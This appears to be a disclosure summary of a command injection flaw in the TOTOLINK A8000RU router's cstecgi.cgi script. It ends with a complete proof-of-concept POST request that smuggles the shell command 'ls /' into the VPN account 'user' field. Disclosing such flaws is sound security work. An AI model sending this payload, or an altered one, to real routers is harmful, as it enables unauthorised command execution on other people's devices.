# A8000RU Command Injection Vulnerability Summary ## Vulnerability Overview The TOTOLINK A8000RU router contains a command injection vulnerability. Attackers can inject arbitrary operating system commands into the `cstecgi.cgi` script by crafting malicious HTTP requests. ## Affected Scope - **Vendor**: TOTOLINK - **Product**: A8000RU - **Version**: 7.1.c643_b20200521 ## Remediation No specific remediation or patch information is currently provided on the page. It is recommended to contact the vendor to obtain updates. ## Proof of Concept (PoC) The following is an example of an HTTP request exploiting this vulnerability to execute the `ls /` command: ```http POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.6.2 Content-Length: 74 X-Requested-With: XMLHttpRequest Accept-Language: en-US,en;q=0.9 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Referer: http://192.168.6.2/basic/index.html Origin: http://192.168.6.2 Accept-Encoding: gzip, deflate, br Cookie: SESSION_ID=21772465702.2 Connection: keep-alive {"topscript":"setVpnAccountCfg","user":"ls /;setVpnAccountCfg.txt"} ```